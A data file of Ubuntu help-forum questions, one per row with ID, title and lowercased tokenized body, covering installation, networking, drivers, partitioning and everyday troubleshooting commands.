398718	asus k55n battery died while in suspend and connected to external monitor	i am having an issue with my asus k55n . last night i had it hooked up to my hdtv via hdmi . and using catalyst control the hdtv was set to primary monitor with my laptops screen turned off . well , i forgot to connect my charger and it died while being suspended . now , when i try and turn it on , i dont get anything . the charge light comes on and the `` power '' light but no other lights and the screen is black.. also , i know its not booted into the os because no keys do anything . ( volume , ect ) anyone have any ideas ? i have tried hooking back to the hdmi and rebooting , nothing happens . just black screen . i have tried having no other screen hooked up and still nothing . i have also tried with vga , again nothing . so frustrating ! it doesnt even show the asus screen on startup .
398719	secure a samba print server in 12.04	i set up a sambda server on my router , and can access it with ubuntu . i installed the following applications to see the share : $ sudo apt-get install samba samba-common system-config-samba however , i now also notice that other devices on my network can see my ubuntu machine , namely with a print server . is this insecure ? is there a way i can get my ubuntu machine into a mode where it 's less visible to other machines ? i 'd rather just be able to access router 's usb-share without having to share anything , whether printer or hd .
398721	ca n't connect to wi-fi with ubuntu	i can not connect to my home network with ubuntu . my home network is protected with a password.every time i enter my pass to connect , ubuntu rejects to connect and keeps showing another code , witch seems to have been remembered by the system and it appears unable to accept new pass . i managed to connect too other wi fi 's . i also have windows on my computer and it connects to my home network with no problems .
398723	internal errors galore , ubuntu not installing	so i have been trying to install ubuntu onto a new hardrive i got , i managed to do it before with some minor issues . i got a pretty good knowledge of computers and know my ins and outs very well but i have tried very hard to figure this all out on my own but nothing i have tried seems to work . i am install ubuntu 12.04.3 lts ( 32 bit , due to limit of motherboard ) and i have checked its md5 hash many times . i have used lili , universal usb installer , and unetbootin . nothing has worked . so this time i typed out everything i was doing and what happened each time and during each step so that i could get the most help possible . system infomation , intel motherboard mq96510j.86a.1761.2009.0326.0001 intel pentium 4 cpu 3.20 ghz ( tends to run at 70 c idling dont know if normal ) ddr2 5120 mb total intergated intel graphics nvida graphics geforce 7100s turboforce vga installing to wd 1 tb hardrive brand new 250 gb and 400 gb hardrives both with windows vista have old files want to keep , not being installed to . used lili to make usb stick . boot computer , everything starts out fine so go straight to install ubuntu . check download updates and install third party contine ... system hangs for about 1 minute . `` creating ext4 file system for / in partition # 1 of scs1 ( 0,0,0 ) ( sda ) ... '' '' installer crashed ! '' when time window appears goes to console `` *starting mouting network filesystems [ ok ] '' '' *stopping mouting network filesystems [ ok ] '' at which point nothing can be done restart . reboot everything fine , go to try ubuntu . goes to desktop . click `` install ubuntu 12.04.03 lts '' nothing , click again . `` system program problem detected '' pops up '' report problem '' '' sorry , ubuntu 12.04 has experienced an internal error '' '' show details '' executable path /usr/sbin/aptd ( message box dissappeared before anything else showed up ) '' report problem '' '' invalid problem report ... typeerror ( error ( 'incorrect padding ' , ) , ) '' another internal error details /usr/share/ubiquity/ ... ( missed the rest because window disappeared ) another internal error contine ... repeat . try to open `` install ubuntu '' again . window to install pops up ( oh god maybe something different ! ) english- > contine internal error ... ( nope ) buttons disappear and nothing more can be done . turn off ... give up ... post question for help . anything you can do to help would be greatly appreciated . sorry for any bad spelling or bad grammar but i just want this thing to work . thanks
398729	remove links in the navigation pane on the left in the ctrl+o menu	i accidently dragged a link into the pane on the left . when i right click to remove the link , it is grayed out and i can not select it . how do i remove the link ? ( this is the ctrl+o menu , not normal window )
398731	an error with youtube-dl	when i run youtube-dl and extract the audio it gives me the error : error : audio conversion failed : unknown encoder 'libmp3lame' could this be because i have ffmpeg and lame installed ? do the two conflict with eachother somehow ?
398732	wireless card driver download	i have a toshiba satellite 1900 . i know it 's old but it still works pretty good . i loaded ubuntu 12.04 and i ca n't seem to install the driver for the pci card . i 've tried downloading and putting onto disc and i always get the same response . something about it is not a zip file . i ca n't remember the exact wording . i 've tried scanning for extra software . nothing helps . it 's a mini pci card pa3171u-1mpc by agere systems .
398733	how do i download ubuntu to a usb through a chromebook	i have a chromebook ( an acer c720 ) and it does n't have enough space for me to the unity form of crouton instead of xfce . how do i download it to a usb instead ?
398734	load data from ubuntu to router 's upnp dlna server	i set up a mini-dlna server on my router with dd-wrt . i have a bunch of music and other media files i would like to be able to stream from my router-attached usb drive to my stereo and android devices . this media is currently stored on my ubuntu device . i do n't particularly want the ubnuntu device to have a media server ( i think because security ? though a media client would be fine ) , however , i ca n't see how to get the files onto the drive without turning my ubuntu device into a media server . can anyone point me to some easy instructions for how to dump several folders of video and audio files onto the router 's mini-dlna upnp server ? i 'm using 12.04 if that helps .
398742	appalling browser performance despite fast 3g connection	this is a recent problem that is making me punch holes through walls . two points up front - my connection speed is fine . using the various speedtest tools out there , it is consistently over 1mbps , 6mbps+ on a good day . my download speeds and file transfers ( p2p , torrents , ftp etc . ) are similarly fine . my browser performance ( whether ff , chrome or opera ) however is decidedly not fine . over the last few weeks it has been in the toilet . http is bad and https is worse . i used curl as described at - how to debug slow browsing speed ? to try and see what the problems may be . these are the outputs - bob @ beelzebubba : ~/curl $ curl -w `` @ curl-timing.cfg '' -o /dev/null -s http : //www.google.com/ dns lookup : 0.162 connect to server ( tcp ) : 0.442 connect to server ( http/s ) : 0.000 time from start until transfer began : 0.442 time for redirection ( if any ) : 0.000 total time before transfer started : 0.752 total time : 0.752 size of download ( bytes ) : 260 average d/l speed ( bytes/s ) : 345.000 bob @ beelzebubba : ~/curl $ curl -w `` @ curl-timing.cfg '' -o /dev/null -s https : //www.facebook.com/ dns lookup : 0.230 connect to server ( tcp ) : 0.729 connect to server ( http/s ) : 1.620 time from start until transfer began : 1.620 time for redirection ( if any ) : 0.000 total time before transfer started : 2.079 total time : 2.080 size of download ( bytes ) : 0 average d/l speed ( bytes/s ) : 0.000 bob @ beelzebubba : ~/curl $ curl -w `` @ curl-timing.cfg '' -o /dev/null -s https : //www.google.com/ dns lookup : 0.118 connect to server ( tcp ) : 0.435 connect to server ( http/s ) : 1.375 time from start until transfer began : 1.375 time for redirection ( if any ) : 0.000 total time before transfer started : 1.825 total time : 1.825 size of download ( bytes ) : 263 average d/l speed ( bytes/s ) : 144.000 generally terrible . my questions are - what could cause this out of the blue ? how can i fix it ? there is very little of help googling . yes i 've cleared caches , nuked cookies , started browsers in safe mode etc .
398747	`` wired network disconnected '' even when connected- no ethernet connection possible	i am unable to connect to the internet via ethernet or wifi . let 's fix the ethernet issue , eh ? i just installed unbuntu 12.04 on an hp mini 1000 . previously it had 11.04 , and the ethernet did n't have any issues then . i am a linux beginner , and i have been working on this issue for the past several days without any progress . here are some outputs : sudo lshw -c network *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : feafc000-feafffff *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 00 serial : 00:25 : b3:48 : e7:60 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 latency=0 link=no multicast=yes port=twisted pair resources : irq:42 memory : febfc000-febfffff ioport : ec00 ( size=256 ) lspci 00:00.0 host bridge : intel corporation mobile 945gse express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller thanks for your help !
398748	i 'm trying to transfer music from my droid 2 to my laptop , but it is n't working	i connect the phone to the computer via usb and i have no idea how to move files . the ejectable disk is n't showing up . what do ? it tried sudo fdisk -l and here is the output : alex @ alex-1015e : ~ $ sudo fdisk -l [ sudo ] password for alex : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 625142447 312571223+ ee gpt partition 1 does not start on physical sector boundary . /dev/sda3 * 0 0 0 0 empty
398753	reboot even if preseed late_command fails ?	during a preseed installation , can i force the machine to reboot after a failed installation ? my use-case is a datacenter that requires costly human intervention to get into the console & reboot the machine . the current behavior i 'm seeing is a console dialog informing me that my late_command failed ( due to a transient network problem . ) once rebooted , the provisioning tool ( foreman ) will re-run the install process , which is exactly what i want . can i tell the preseed configuration to automatically reboot even on failure ? see also this related question .
398758	file/edit unity menu entries disabled ( ubuntu 13.10 )	i have a clean installation of ubuntu 13.10 with unity desktop . when i open gnome-terminal ( or any other app ) the entries in file/edit/view are all disabled by default ; they are not clickable . it seems to be a problem similar to unity menus do n't display properly but all items are disabled in my case . this is not specific to gnome-terminal but all applications ; though for some applications some menu items are clickable . update : i think i found the reason for it .
398759	installation menu in ubuntu 13.10	when i try to install ubuntu , i am unable to view the installation menu . the only thing i can see is a black screen . are there other methods to install ubuntu 13.10 , & is this a graphic problem ?
398760	a partitioning question	i am looking at partitioning a new hard drive and i am not sure on how to go about it . the drive that i am installing linux on ( mint at the moment but might change and also looking at a couple at the same time ) is 1tb and i would like to separately partition for my / and /home . i have googled a bit and seen suggestions for the /tmp , /usr , and /var directories to be on separate partitions and would appreciate any information on the benefits and ballpark figures on the sizes required . i know that the swap needs to be a primary and to have it on its own partition too . i was also wondering if i could partition 3 / directories and install three different linux distros on the one hard drive and access my home directory and personal files from all three without any trouble . i know that they would all have to be primary . i am not sure how applications install and if they would need to be installed on each os , or accessible from all three . i realise three is a bit excessive but i would like to try them and even going through the process of installing them and partitioning is a valuable learning experience .
398761	install ubuntu on asus m2v-tvm	configuration : athlon 64 , asus m2v-tvm , 4gb ddr2 ram , nvidia video card . tried almost every ubuntu based live-cd , but it freezes after a couple of minutes after boot . though , i can see the desktop . i was able to install using the server or mini version but once in desktop , it freezes again . if i run my system on recovery-mode , there are no freezes . my question , what version of ubuntu should i try ? or else , what can i do to solve the freezes .
398765	interpretting output from fsck	i 'm working on a project using git , and ran into some problems : how to diagnose and fix git fatal unable to read tree the comments suggested that my issue might be related to my file system , so i have tried a few things but wanted to check them here . i booted ubuntu 12.10 from a live cd and ran sudo fdisk -l which gave this output disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3c7b1a0a device boot start end blocks id system /dev/sda1 2048 22499327 11248640 27 hidden ntfs winre /dev/sda2 * 22499328 22704127 102400 7 hpfs/ntfs/exfat /dev/sda3 22704128 521973347 249634610 7 hpfs/ntfs/exfat /dev/sda4 521973758 976771071 227398657 5 extended /dev/sda5 958926848 976771071 8922112 82 linux swap / solaris /dev/sda6 521973760 958926847 218476544 83 linux partition table entries are not in disk order disk /dev/sdd : 1998 mb , 1998585856 bytes 16 heads , 32 sectors/track , 7624 cylinders , total 3903488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004d834 device boot start end blocks id system /dev/sdd1 32 3903487 1951728 b w95 fat32 i then ran sudo fsck /dev/sda6 which gave fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) /dev/sda6 : clean , 832860/13656064 files , 5764993/54619136 blocks does this mean that my file system is ok ? are there any other commands that i should check ? i have tentatively added the git tag to this question , as that 's really where the problem seems to lie- i 'm not entirely sure what the status of my file system is , but would love to get to the bottom of it .
398767	chown has no effect even after it claims it changed owner	the user 'user ' exists on the server . the group 'homeusers ' exist on the server . this is what is happenening : user @ localhost / $ ssh user @ server user @ server : ~ $ lsb_release -a description : ubuntu 12.04.3 lts user @ server : ~ $ cd /mount/somedir/ user @ server : /mount/somedir $ ls -al drwxrwxrwx 1 root root 4096 nov 24 20:55 . drwxr-xr-x 5 root root 4096 nov 30 10:11 .. drwxrwxrwx 1 root root 4096 dec 2 02:11 somechild user @ server : /mount/somedir $ sudo chown -v user : homeusers somechild changed ownership of `somechild ' from root : root to user : homeusers user @ server : /mount/somedir $ ls -al drwxrwxrwx 1 root root 4096 nov 24 20:55 . drwxr-xr-x 5 root root 4096 nov 30 10:11 .. drwxrwxrwx 1 root root 4096 dec 2 02:11 somechild
398768	wacom tablet weird interaction with manga studios	i installed manga studios 5ex with wine , the application seems to be working fine . i used source forge to get drivers for my intuos 4 tablet , and although the tablet settings options are very different from the windows version , and some aspects of the tablets physical button interface are different , it all seems to be working . i can use the tablet in place of my mouse and i can set the buttons and scroll wheel to do what i want . my problem comes when i open manga studios 5 , and it is a very strange problem . when i use my normal mouse everything in ms5 works normally , i can draw ( without pressure sensitivity ) but i checked most of the features and wine seems to have handled the installation well . everything seems to work fine with the mouse . the tablet , at first seems to also work in ms5 , i can use it to select a pen or pencil change colors and open a new page to draw on . however the pen does not work in the canvas area of the page . when i move my pen such that the cursor would enter the canvas area , the cursor simply disappears . if i make it all the way to the other side of the canvas area , to the far right side where the screen space is used by more menus , my cursor reappears and works normally . if i try to draw in an area with the cursor while using the pen nothing happens , i can switch to the mouse and draw on the canvas but for some reason the pen and tablet seem to only work on the menu portions of the application . sadly i am a very new ubuntu users and i ca n't provide more information than this . honestly unless someone else has had this exact same problem i doubt anyone will have a solution but here is hoping . in the mean time i am trying to get cs6 up an running to test the tablet in a different application that is also pressure sensitive . i used the gnome paint tool and my tablet worked fine , but it was not pressure sensitive and i suspect the problem might have something to do with the pen and tablet not working when they are supposed to display pressure sensitivity . edit : in case anyone ever has this problem , there seems to be an option under file preferences in manga studios 5 checking the box for c ordinate mode or tablet control area both seem to make the pen work on the canvas with pressure sensitivity . so far i am experiencing some glitchyness with the pen , the cursor seems to skip around a lot but i ca n't actually tell if this is effecting my ability to draw with it or not , i will play with these settings to see if it gets better . in any case if anyone ever has this problem , then the solution might be to change these settings in manga studio .
398770	graphics problem on dell 1525 12.04 lts hdmi output	i have a dell 1525 laptop running 12.04 lts . i can not seem to get the hdmi output to work at all with the default driver . i read and searched around for the correct nvidia driver for this machine , but anything i tried made the laptop screen resolution wrong and the hdmi output still not work . any suggestions ? graphics : vesa : intel ( r ) gm965/pm965/gl960 graphics . thanks !
398772	ubuntu server and java	i 'm trying to host a runescape private server on one of my old dell machines and i 'm just about to install java now ... should i install jre or jdk and in what directory should i install them to ? does it matter ? should they be in the same directory as my game server files ? these all probably sound like dumb questions but im still learning and i 'm hoping someone can help me out !
398773	calendar does n't display on toolbar	i noticed the calendar has vanished from the toolbar . i remember seeing it but today i ca n't see it . is it related to 2013-2014 transition ? how do i get it back ? i have a win 8.1/ubuntu 13.10 dual boot dell inspiron .
398775	how can i check if an apport report does not contain any sensitive information ?	i know the crash reports are stored at /var/crash . but can i do something to check that the report does not contain any sensitive information ? where can i find the list of reports that i or other users have sent using apport ? also how secure and privacy respecting is apport in general ? e.g . if i send a report about ubunutu software center is it possible that it might contain my user password or my gmail password i entered in my browser ? if yes , which typical user would in her right mind send an apport report to ubuntu ?
398776	an installation of owncloud requires 12.04 server but mine is not stated as '' server ''	i am a super newbie so i hope this is not a stupid question but what will i need to qualify to run this software package ? i 've installed openssh and apache2 and they work fine so i think many of the server attributes may be on my system but how might my system yet be lacking ?
398780	my computer runs windows 7 64-bit , but wo n't install the 64-bit version of ubuntu	i have a laptop that runs windows 7 64-bit . i 'm trying to install ubuntu to be a secondary operation system , but when i run the setup i get a screen that says this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . i downloaded the 32-bit version and installed it in an oracle vm virtualbox and it works fine , so it 's really not that big of a deal , but i 'm curious as to why it 's saying i do n't have the right kernel .
398784	is there a way to encrypt my files without full disk encryption	i want to encrypt my files and folders without full disk encryption and encrypted volumes . can anyone help me ?
398788	avoiding unnecessary dns lookup	i have added few host files in my /etc/hosts but still dns is querying those files . i have already tried /etc/nsswitch.conf hosts : files dns also /etc/host.conf : order hosts , bind but still its doing the dns query .
398790	how to make the shift switcher select the window after i release the key	i use shift switcher to surf through the open windows and select the desired one . i 've configured the combinations so that they do n't conflict with others . mainly i use the next window , super + q and previous window , super + shift + q switches . but release the keys ( or the super key ) does not make the selected window active ; i have to hit the modifier keys like return , shift , alt , etc . or click with the mouse pointer for both switcher modes ( cover/flip ) . but i 'd like the selected window getting activated right when i release the button , similar to what we have with the alt + tab switching . ( flip mode shift switch ) ( cover mode shift switch ) here 's a snapshot of my key combinations for the window management option in compizconfig settings manager :
398791	usb file transfer painfully slow - is this a solution in some cases ?	a new ubuntu user here . case 1 : system : f730 with 4 gb ram - success no problems installed 2007 office http : //rmitc.org/2013/04/ultimate-microsoft-office-2010-installation-on-ubuntu/ another link helped me to clean the bloatware ( if i can say ) . my load averages fall to less than 2 ( earlier it was around 3.5 ) . for a naive user , it does look like this is good since i do not see any hang up or sluggishness in system response . http : //thanhsiang.org/faqing/node/189 i made a live cd for above installation . case 2 : system : dell dimension 4600 , pentium 4 , 3 gb ram with xp . installation of ubuntu from xp - success installation of office ( above method ) - success but took full night with load averages around 11 . fail installation of fonts ( copied from another ms system ) , tried to transfer the folder ( 300 mb ) onto dimension 4600 - fail the problem : after plugging in usb onto ubuntu ( dual with xp ) , everything looks great . when i transfer the folder , the process starts . initially , the speeds are high . 40 mb takes less few minutes ( load average around 3 ) , from around 40 - 60 , 70 mb , it used to take another 3-4 minutes ( load average around 6 ) . from this point , the speed drops to literally few kb/sec if not less . the load average shoots to double digit . the system stops responding . repeated numerous times . no success . this also happened if i tried to download any big file from internet as well . poured over google and tried every possible solution out there . tried updating graphics driver etc ... .everything possible or mentioned in the context . no success . one thing over and over i came across is not every installation has this problem and only few people experienced this and even the developers are unable to recreate the problem . so deadend everywhere . finally decided to wipe the whole disc and start with fresh installation . using live cd , i tired to install . i forgot my live cd was 64 bit and the hardware doesnot support 64 bit . the installation aborted . i made a 32 bit live cd and installed everything including lxde and office . everything was and is super fast now . no problems at all . the load average is between 1 and 2 . is this at least a partial solution for painful usb transfer ? ? may be ... in my case it worked .
398793	scroll bar gets in the way of grabbing from a pan column on the right hand side	i 've only seen this in pan , it seems to do this on a quasi-regular basis : the problem is how to `` grab '' the date column on the right hand side . unfortunately , the little up/down arrow widget gets in the way . how do i grab the column from the right hand side to resize the column horizontally , shrink it to make the other columns available ? ( yes , it 's some sort of bug , probably with pan , that it does this sometimes , but i 'm just asking about how fiddle with the window . ) this : http : //askubuntu.com/a/45087/45156 does n't seem to do the trick . i 've tried resizing the window , of course .
398799	want to uninstall and delete ubuntu and go back to windows 7	please read the title - it explains it all . i 've googled this and there are dozens ( maybe even more ) helps - and most say i need a windows 7 cd recovery disk , which i never received when i bought the computer 4 years ago . i 've had to put the computer back to factory settings several times in the past using the f11 without a windows 7 recovery cd . now i ca n't even do that ! someone said i 'd have to take the computer in for in-store repair . please tell me that is n't so !
398800	are per-app settings for the overlay scrollbar possible ?	is it possible to set certain applications to use conventional scrollbars rather than the overlay ones ? there are instances where the overlay scrollbar could hinder functionality : scroll bar gets in the way of grabbing from a pan column on the right hand side and the last line in geany window is obscured
398802	screen flashes on caps lock press	i am using ubuntu 12.04 lts . on pressing caps lock key , screen flashes out whenever the key is pressed . its happening only when in gnome mode . in ubuntu mode login the screen does not flashes . please help its so irritating ...
398803	compaq presario cq42 notebook is overheating	i 'm a new ubuntu user , using ubuntu 13.10 . how do i reduce overheating in my compaq presario cq42 notebook , which is heating up very quickly ?
398805	i have installed ubuntu 13.04- graphics card not working but can i do	i have installed ubuntu 13.04 . i check my graphics drive it shows unknown.but can i do to make my graphics card detect . or install a new graphics card.and also my gui interface not working only command mod working .
398807	how to install if i already have 4 partitions	ok , so i know there are already questions like this , but mine is different ( i think ) . so i had 4 partitions ( c : ,recovery , system , hp tools ) , and i backed up everything to a set of dvds . i then removed the recovery partition ( about 200 mb free now ) . so now what do i do to install ubuntu . ( and can you please go in detail on what i do : do i select `` install alongside windows 7 normally '' , or do i select `` something else '' ? and if i have to select `` something else '' , can you go in detail of what i have to do after that ? thank you very much ,
398810	dual boot ubuntu on windows 8.1 : can not see partitions	i am trying to install ubuntu 13.10 on my toshiba e45t-a4300 laptop running windows 8.1 . after booting from live usb , during the installation process , it does not take me into the screen with the options like `` erase disk and install ubuntu '' , `` something else '' etc . instead , it takes me directly into the `` installation type '' window which displays the device , type , partition tables etc . however , it does not list any of the disk devices , as you can see the below screenshot i tried to run gparted , but it gives me the error `` the backup gpt table is not at the end of the disk , as it should be . this might mean that another operating system believes the disk is smaller . fix , by moving the backup to the end ( and removing the old backup ) ? '' . i just cancelled this operation , as i am not sure . as per instructions , i had turned off `` fast startup '' in windows , and have also disabled `` secure boot '' in uefi settings . i even changed the `` boot mode '' from `` uefi boot '' to `` csm boot '' , but to no avail . i shrunk the c : drive on windows as per instructions . on running sudo lsblk -o name , fstype , size , mountpoint , label , linux is recognizing the partitions . strange that the installation is not able to see them ? here is the combined image of screenshots from windows disk management and linux lsblk : can someone help , please !
398813	is there a tool or trick to help with quoting madness ?	when doing server maintenance , i often find myself writing multi-level nested commands , so as : for server in a b c ; do sh -c `` ssh $ server 'mysql db -e \ '' select where line like \\\ '' % abc % \\\ '' \ '' ' & '' ; done this may be a contrived example , but it 's really the kind of thing i have to do sometimes for some odd , ad-hoc task . the problem is the quotes . as you go to deeper levels , you have to start escaping the quotes , escaping dollar signs , and escaping the escaping . using single quotes helps avoid one level , but that 's it . i began working on a solution for myself , inspired by the qq ( ) function in perl , but i thought i 'd ask around first : is there a tool , method or framework that will make it easier to write these nested commands without getting bogged down with backslashes ?
398814	ubuntu server installer ca n't connect to ethernet	i recently built a server with the following specs : -asus p9d-m motherboard -intel xeon e3-1220 v3 ( haswell ) cpu -8gb kingston ecc 1600mhz ddr3 -1tb western digital hdd -450w psu + case combo the rig boots , and i try installing ubuntu server ( tried both 12.04.3 and 13.10 ) , but it gets to the network configuration part and fails . it does recognize the 2 intel ethernet ports on my server , but it does n't seem to be able to connect to the internet through them . i know the ethernet works because i had another server ( ubuntu 12.04.3 ) hooked up to the same one until i unplugged it to plug this new server in . i ca n't install the os because it apparently needs to download the installer components . i 've tried everything i can think of ( restarting the comp , restarting the modem , switching the ethernet cable between ports , using 13.10 and 12.04 , other things ) and it is being quite stubborn . anyone have any suggestions to fix it ?
398818	how to remove symbolic link	i was doing sudo ln -s /usr/share/phpmyadmin /var/www/phpmyadmin but i accidentally typed something else . so now i want to correct it but it says symbolic link already exist . please help , thanks in advance
398823	dropbox syncronization problem	i am using 12.04 and tried dropbox but faced the following problem . : irtaza @ irtaza-optiplex-990 : ~ $ sudo apt-get install nautilus-dropbox reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nautilus-dropbox : depends : dropbox but it is not going to be installed e : unable to correct problems , you have held broken packages . how to solve this ?
398824	codec for mp3 for 12.04 lts	how do i add codecs for mp3 url streams ? i am running ubuntu 12.04 with the standard firefox from 12.04
398825	webcam gives black after suspend	i was using skype when the computer automatically suspended/hibernated due to the battery condition . but when right after i switch on the computer and use skype all i get is a black screen from my webcam , the other party ca n't see a thing . i 'm using ubuntu 13.04 64 bit version . can you help me out , i installed cheese and it too gives me the black screen . thanks .
398826	creative recon 3d sound card is not working in ubuntu 13.10	i have a creative recon 3d sound card . it was working in ubuntu 13.04 64 bit by a method i learned in ubutnu forum . first i run the below command in the terminal ... echo `` options snd-hda-intel position_fix=1 '' | sudo tee -a /etc/modprobe.d/alsa-base.conf and after that add these two lines before the command `` exit 0 '' on the file rc.local on /etc directory : rmmod snd_hda_intel modprobe snd_hda_intel position_fix=1 and my sound card was working very well in 13.04 . but now i installed ubuntu 13.10 and follow the same process but there is no sound at all . i am using 64bit . hope it will work in this version of ubuntu . thanks for advance .
398829	system requirements for installing ubuntu	i wanted to know that can we install ubuntu on the following system requirements : -- processor : intel ( r ) core ( tm ) 2 duo cpu e4700 @ 2.60ghz ( 2 cpus ) , ~2.6ghz memory : 2048mb ram directx version : directx 11 display devices card name : intel ( r ) g33/g31 express chipset family manufacturer : intel corporation chip type : intel ( r ) gma 3100 dac type : internal device key : enum\pci\ven_8086 & dev_29c2 & subsys_75291462 & rev_10 display memory : 256 mb
398832	removing windows 7 and install ubuntu server 12.03.4 ( but windows boot manager still appear )	i removed windows 7 and installed ubuntu server 12.03.4 but when the computer start the ( black screen for windows boot manager appear ) like this : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . status : 0xc0000225 info : the boot selection failed because a required device is inaccessible . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i want to remove it and i do n't know how can do it ? plz can you help me
398833	ca n't connect to internet after installation of ubuntu desktop in server 12.04 lts	i have ubuntu server 12.04 lts , on which my internet connection was running smoothly before . afterwards , i installed ubuntu desktop but now the server ca n't connect to the internet . i can access the internet from another pc , though . i ca n't seem to figure out the problem .
398836	does ubuntu one have a file size or type limit ?	i uploaded a 1.7g .iso file to ubuntu one , kept tracking for a good while with u1sdtool . but when it was uploaded and u1sdtool gave feedback that there was no transfer going on , i went and checked my files through the website , it was n't there . was that too big or is there limits on file-type such for example .iso file .
398841	ubuntu 13.04 remmina rdp with windows 7 sound	i 'm struggeling with a problem for a while , i 'm using remmina to connect to w7 ( 32/64 ) pc 's using rdp-protocol . after an update the sound stopped working , means i can not use local sound , which works with an xp-machine . i deleted the `` known-hosts-file '' , i completely re-installed remmina , using standard configuration and new config-files , no change . any suggestions what might be wrong ?
398842	dell d830 does n't boot from hard drive but does boot from usb drive	ubuntu 12.04 hangs on its first startup after installing to internal hard drive and displays a flashing underscore character in upper left corner of dark screen . the 'try ubuntu ' feature works great when booting from external usb hard drive . lubuntu 12.04 gave the same result as ubuntu 12.04 . i do get a recovery mode option at startup and it hangs after displaying below line item ( with or without usb hard drive connected ) [ 2.565863 ] usb 7-1.2 : new full speed usb device number 4 using uhci_hcd the boot-repair solution i found on the forums made no difference and generated this report . updating to the latest bios made no difference and neither did using factory defaults for the bios configuration . other forum activity indicates 12.04 can run on the dell d830 laptop .
398848	can not login to 12.04 in the gui	i have 12.04 on my machine , and after a shut down and a restart i have n't been able to log into the gui , after entering my password , it switches back to the gui and does not accept it . i 've tried the following : ctrl+alt+f1 , login via tty1 - worked fine , so the password and user works tried to remove the .xauthority file - does not exist tried to restart the lightdm - no change , still can not log in tried to install the gdm , but no apt-get command works , it fails to connect to the required web address tried the sudo chown -r $ user : $ user /home command , still can not log in do you have any suggestions what can i do ?
398852	virtualbox ubuntu 12 stuck on boot screen with logo	i am running ubuntu 12 on virtualbox ( version 4.2.6 ) on mac os x. i installed the guest additions by following the instructions from here ( http : //xmodulo.com/2013/07/how-to-install-virtualbox-guest-additions-for-linux.html ) and now after i restarted , it gets stuck on the initial screen with the ubuntu logo and the loading bar which is all lit up . how can i get around this and perhaps revert the latest changes with the guest additions ( i assume they are what is causing the problem ) ?
398855	intel centrino centrino advanced-n 6235 weak wireless reception	i use this card in a computer with ubuntu 12.04.3 installed . the wi-fi works , but the reception is very weak , compared to a windows based pc at the exact same place ( plus other issues like when external drive plugged , see my other post ) . do i need to install the linux driver for the card ( http : //wireless.kernel.org/en/users/drivers/iwlwifi ) , or is it is already installed automatically by ubuntu ?
398858	4 monitors dual graphics card	i 've a new pc at work , which , for some reason , wo n't work with my nvidia quadro gfx card . the pc has on board gfx witt an intel based chip set that supports dual monitors . i can get a third screen running via the quadro , with nouveau , but not the fourth ( the fourth is detected , but wo n't turn on , xrandr throws an error ) if i run three screens , i get massive tearing on the third display . if i install the nvidia drivers , i ca n't get a graphical environment . is there a gfx card that would allow me to run 4 monitors ? ( 2 on internal , 2 on external ) using nouveau ?
